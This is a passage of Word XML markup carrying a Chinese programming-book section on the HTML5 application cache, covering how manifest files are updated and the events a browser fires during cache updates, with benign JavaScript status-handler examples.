    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当一个</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用从缓存中载入的时候，所有与之相关的文件也是直接从缓存中获取。在线状态下，浏览器会异步地检查清单文件是否有更新。如果有更新，新的清单文件以及清单中列举的所有文件都会下载下来重新保存到应用程序缓存中。但是，要注意的是，浏览器只是检查清单文件，而不会去检查缓存的文件是否有更新：只检查清单文件。比如，如果修改了一个缓存的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>文件，并且要想让该文件生效，就必须去更新下清单文件。由于应用程序依赖的文件列表其实并没有变化，因此最简单的方式就是更新版本号：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>CACHE MANIFEST</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:t>MyApp version 1(</w:t>
      </w:r>
      <w:r>
        <w:t>更改这个数字以便让浏览器重新下载这个文件</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>MyApp.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>MyApp.js</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>同样，如果想要让</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用从缓存中</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>卸载</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，就要在服务器端删除清单文件，使得请求该文件的时候返回</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP 404</w:t>
      </w:r>
      <w:r>
        <w:t>无法找到的错误，同时，修改</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文件以便他们与该清单列表</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>断开链接</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>要注意的是，浏览器检查清单文件以及更新缓存的操作是异步的，可能是在从缓存中载入应用之前，也有可能同时进行。因此，对于简单的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用而言，在更新清单文件之后，用户必须载入应用两次才能保证最新的版本生效：第一次</w:t>
      </w:r>
      <w:r>
        <w:t>是从缓存中载入老版本随后更新缓存；第二次才从缓存中载入最新的版本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>浏览器在更新缓存过程中会触发一系列事件，可以通过注册处理程序来跟踪这个过程同时提供反馈给用户。如下例所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>applicationCache.onupdateready=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var reload=confirm("A new version of this application is available\n"+"and will be used the next time you reload.\n"+"Do you</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> want to reload now?");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(reload)location.reload();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要注意的是，该事件处理程序是注册在</w:t>
      </w:r>
      <w:r>
        <w:t>ApplicationCache</w:t>
      </w:r>
      <w:r>
        <w:t>对象上的，该对象是</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>applicationCache</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值。支持应用程序缓存的浏览器会定义该属性。此外，除了上面例子中的</w:t>
      </w:r>
      <w:r>
        <w:t>updateready</w:t>
      </w:r>
      <w:r>
        <w:t>事件之外，还有其他</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>种应用程序缓存事件可以监控。例</w:t>
      </w:r>
      <w:r>
        <w:t>20-4</w:t>
      </w:r>
      <w:r>
        <w:t>展示了一个简单的处理程序通过显示对应的消息来通知用户缓存更新的进度，以及当前缓存的状态。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>20-4</w:t>
      </w:r>
      <w:r>
        <w:t>：处理应用缓存相关事</w:t>
      </w:r>
      <w:r>
        <w:t>件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>下面所有的事件处理程序都使用此函数来显示状态消息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>由于都是通过调用</w:t>
      </w:r>
      <w:r>
        <w:t>status</w:t>
      </w:r>
      <w:r>
        <w:t>函数来显示状态，因此所有处理程序都返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>来阻止浏览器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>显示其默认状态消息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function status(msg){//</w:t>
      </w:r>
      <w:r>
        <w:t>将消息输出到</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>"statusline"</w:t>
      </w:r>
      <w:r>
        <w:t>的文档元素中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.getElementById("statusline").innerHTML=msg;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(msg);//</w:t>
      </w:r>
      <w:r>
        <w:t>同时在控制台输出此消息，便于调试</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>每当应用程序载入的时候，都会检查该清单文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>也总会首先触发</w:t>
      </w:r>
      <w:r>
        <w:t>"checking"</w:t>
      </w:r>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.applicationCache.onchecking=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>status("Checking for a new version.");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>如果清单文件没有改动，同时应用程序也已经缓存了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//"noupdate"</w:t>
      </w:r>
      <w:r>
        <w:t>事件会被触发，整个过程结束</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.applicationCache.onnoupdate=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>status("This version is up-to-dat</w:t>
      </w:r>
      <w:r>
        <w:t>e.")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>如果还未缓存应用程序，或者清单文件有改动</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>那么浏览器会下载并缓存清单中的所有资源</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>触发</w:t>
      </w:r>
      <w:r>
        <w:t>"downloading"</w:t>
      </w:r>
      <w:r>
        <w:t>事件，同时意味着下载过程开始</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.applicationCache.ondownloading=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>status("Downloading new version");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.progresscount=0;//</w:t>
      </w:r>
      <w:r>
        <w:t>在下面的</w:t>
      </w:r>
      <w:r>
        <w:t>"progress"</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序会用到</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>在下载过程中会间断性地触发</w:t>
      </w:r>
      <w:r>
        <w:t>"progress"</w:t>
      </w:r>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>通常是在每个文件下载完毕的时候</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.applicationCache.onprogress=function(e){//</w:t>
      </w:r>
      <w:r>
        <w:t>事件对象应当是</w:t>
      </w:r>
      <w:r>
        <w:t>"process"</w:t>
      </w:r>
      <w:r>
        <w:t>事件（就像哪些被</w:t>
      </w:r>
      <w:r>
        <w:t>XHR2</w:t>
      </w:r>
      <w:r>
        <w:t>使用的），</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>通过该对象可以计算出下载完成比例，但是，如果它不是</w:t>
      </w:r>
      <w:r>
        <w:t>"process"</w:t>
      </w:r>
      <w:r>
        <w:t>事件，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>我们统计调用的次数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var progress="";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(e</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>e.lengthComputable)//"process"</w:t>
      </w:r>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t>计算下载完成比例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>progress</w:t>
      </w:r>
      <w:r>
        <w:t>=""+Math.round(100*e.loaded/e.total)+"%"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else//</w:t>
      </w:r>
      <w:r>
        <w:t>否则，输出调用次数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>progress="("+++progresscount+")"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>status("Downloading new version"+progress);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>当下载完成并且首次将应用程序下载到缓存中时，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器会触发</w:t>
      </w:r>
      <w:r>
        <w:t>"cached"</w:t>
      </w:r>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>window.applicationCache.oncached=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">status("This </w:t>
      </w:r>
      <w:r>
        <w:t>application is now cached locally");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>当下载完成并将缓存中的应用程序更新后，浏览器会触发</w:t>
      </w:r>
      <w:r>
        <w:t>"updateready"</w:t>
      </w:r>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>要注意的是：触发此事件的时候，用户任然可以看到老版本的应用程序</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.applicationCache.onupdateready=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>status("A new version has been downloaded.Reload to run it");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>如果浏览器处于离线状态，检查清单列表失败，则会触发</w:t>
      </w:r>
      <w:r>
        <w:t>"error"</w:t>
      </w:r>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>当一个未缓存的应用程序引用一个不存在的清单文件，也会触发此事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.applicationCache.onerror=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>status("Couldn't load manifest or cache application");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>如果一个缓存的应用程序引用一个不存在的清单文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>会触发</w:t>
      </w:r>
      <w:r>
        <w:t>"obsolete"</w:t>
      </w:r>
      <w:r>
        <w:t>事件，同时会将应用从缓存中移除</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>之后都不会从缓存</w:t>
      </w:r>
      <w:r>
        <w:t>而是通过网络来加载资源</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.applicationCache.onobsolete=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>status("This application is no longer cached."+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"Reload to get the latest version from the network.");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return false;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每次载入一个设置了</w:t>
      </w:r>
      <w:r>
        <w:t>manifest</w:t>
      </w:r>
      <w:r>
        <w:t>属性的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文件，浏览器都会触发</w:t>
      </w:r>
      <w:r>
        <w:t>"checking"</w:t>
      </w:r>
      <w:r>
        <w:t>事件，并通过网络载入该清单文件。不过之后，会随着不同的情况触发不</w:t>
      </w:r>
      <w:r>
        <w:t>同的事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>没有可用的更新</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果应用程序已经缓存并且清单文件没有改动，则浏览器会触发</w:t>
      </w:r>
      <w:r>
        <w:t>"noupdate"</w:t>
      </w:r>
      <w:r>
        <w:t>事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>有可用的更新</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>如果应用程序已经缓存了并且清单文件发生了改动，则浏览器会触发</w:t>
      </w:r>
      <w:r>
        <w:t>"downloading"</w:t>
      </w:r>
      <w:r>
        <w:t>事件，并开始下载和缓存清单文件中列举的所有资源。随着下载过程的进行，浏览器还会触发</w:t>
      </w:r>
      <w:r>
        <w:t>"progress"</w:t>
      </w:r>
      <w:r>
        <w:t>事件，在下载完成后，会触发</w:t>
      </w:r>
      <w:r>
        <w:t>"updateready"</w:t>
      </w:r>
      <w:r>
        <w:t>事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>首次载入新的应用程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果还未缓存应用程序，如上所述，</w:t>
      </w:r>
      <w:r>
        <w:t>"downloading"</w:t>
      </w:r>
      <w:r>
        <w:t>事件和</w:t>
      </w:r>
      <w:r>
        <w:t>"progress"</w:t>
      </w:r>
      <w:r>
        <w:t>事件都会触发。但是，当下载完成后，浏览器会触发</w:t>
      </w:r>
      <w:r>
        <w:t>"cached"</w:t>
      </w:r>
      <w:r>
        <w:t>事件而不是</w:t>
      </w:r>
      <w:r>
        <w:t>"updateready"</w:t>
      </w:r>
      <w:r>
        <w:t>事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>浏览器处于离线状态</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果浏览器处于离线状态，它无法检查清单文件，同时它会触发</w:t>
      </w:r>
      <w:r>
        <w:t>"error"</w:t>
      </w:r>
      <w:r>
        <w:t>事件。如果一个未缓存的应用程序引用一个不存在的清单文件，浏览器也会触发该事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>清单文件不存在</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果浏览器处于在线状态，应用程序也已经缓存起来了，但是清单文件不存在（返回</w:t>
      </w:r>
      <w:r>
        <w:t>404</w:t>
      </w:r>
      <w:r>
        <w:t>无法找到错误），浏览器会触发</w:t>
      </w:r>
      <w:r>
        <w:t>"obsolete"</w:t>
